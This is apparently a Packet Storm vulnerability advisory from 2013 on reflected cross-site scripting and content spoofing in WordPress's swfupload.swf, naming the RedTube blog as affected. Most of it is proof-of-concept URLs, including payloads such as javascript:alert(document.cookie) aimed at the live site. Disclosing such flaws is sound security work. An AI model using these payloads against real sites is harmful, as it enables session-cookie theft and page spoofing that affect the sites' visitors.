The Redtube official blog suffers from a cross site scripting vulnerability. The author has received no response from the owner once reporting this issue.
bf3e341e19ca11d4c98eb5882fab31af5f8c4727a0a9c315a87690786521fdc4#########################################################
# Title : Cross Site Scripting in RedTube Official Blog.
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: June 6/2013 (4.44 pm)
# Vendor: https://wordpress.org/plugins/nextgen-gallery/
# Type : Web Apps
# Vector of operation: Remote
# Impact: Cross Site Scripting & Content Spoofing
# Tested on : Ubuntu / Window XP
##########################################################
*Description:
The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.
There are two vulnerabilities in RedTube Official Blog.
*Content Spoofing
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='https://i.imgur.com/ltp2L8N.jpg'>
It's possible to inject text, images and html (e.g. for link injection).
*Cross-Site Scripting
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
or
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
Code will execute after click. It's strictly social XSS.
*Proof of Concept Code
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName=[XSS]
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=testbuttonText=test<img src='https://i.imgur.com/ltp2L8N.jpg'>
*Live Preview
https://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
https://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
https://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='https://i.imgur.com/ltp2L8N.jpg'>
*Screenshot
https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/182547_425615577534257_1920413802_n.jpg
*Solution:
On the server side, you can upgrade to a non-vulnerable version. Onthe client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.
Reff: https://justryuz.blogspot.com/2013/05/title-cross-site-scripting-in-redtube.html
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed